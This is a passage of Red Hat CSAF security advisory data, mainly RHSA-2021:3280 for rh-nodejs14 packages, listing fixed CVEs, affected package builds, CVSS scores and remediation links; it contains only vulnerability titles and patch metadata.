"https://snyk.io/vuln/SNYK-JS-AJV-584908" } ], "release_date": "2020-07-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function" } ] }
rhsa-2021_3280
Vulnerability from csaf_redhat
Published
2021-08-26 10:21
Modified
2024-11-15 10:36
Summary
Red Hat Security Advisory: rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon security update
Notes
Topic
An update for rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: rh-nodejs14-nodejs (14.17.5).
Security Fix(es):
* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22930)
* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22940)
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* c-ares: Missing input validation of host names may lead to domain hijacking (CVE-2021-3672)
* nodejs: Improper handling of untypical characters in domain names (CVE-2021-22931)
* nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite (CVE-2021-32803)
* nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite (CVE-2021-32804)
* nodejs: Incomplete validation of tls rejectUnauthorized parameter (CVE-2021-22939)
* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon is now available for Red Hat Software Collections.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: rh-nodejs14-nodejs (14.17.5).\n\nSecurity Fix(es):\n\n* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22930)\n\n* nodejs: Use-after-free on close http2 on stream canceling (CVE-2021-22940)\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* c-ares: Missing input validation of host names may lead to domain hijacking (CVE-2021-3672)\n\n* nodejs: Improper handling of untypical characters in domain names (CVE-2021-22931)\n\n* nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite (CVE-2021-32803)\n\n* nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite (CVE-2021-32804)\n\n* nodejs: Incomplete validation of tls rejectUnauthorized parameter (CVE-2021-22939)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:3280", "url": "https://access.redhat.com/errata/RHSA-2021:3280" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1956818", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1956818" }, { "category": "external", "summary": "1988342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988342" }, { "category": "external", "summary": "1988394", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988394" }, { "category": "external", "summary": "1990409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990409" }, { "category": "external", "summary": "1990415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415" }, { "category": "external", "summary": "1993019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993019" }, { "category": "external", "summary": "1993029", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993029" }, { "category": "external", "summary": "1993039", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993039" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_3280.json" } ], "title": "Red Hat Security Advisory: rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon security update", "tracking": { "current_release_date": "2024-11-15T10:36:35+00:00", "generator": { "date": "2024-11-15T10:36:35+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:3280", "initial_release_date": "2021-08-26T10:21:32+00:00", "revision_history": [ { "date": "2021-08-26T10:21:32+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-08-26T10:21:32+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T10:36:35+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } } ], "category": "product_family", "name": "Red Hat Software Collections" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "product": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "product_id": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.17.5-1.el7?arch=src" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "product": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "product_id": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5.el7?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "product_id": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.17.5-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "product_id": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.17.5-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "product": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "product_id": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.14-14.17.5.1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.17.5-1.el7?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "product_id": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.17.5-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "product_id": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.17.5-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "product": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "product_id": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.14-14.17.5.1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.17.5-1.el7?arch=s390x" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.17.5-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.17.5-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "product": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "product_id": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.14-14.17.5.1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.17.5-1.el7?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "product": { "name": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "product_id": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-docs@14.17.5-1.el7?arch=noarch" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product_id": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5.el7?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": 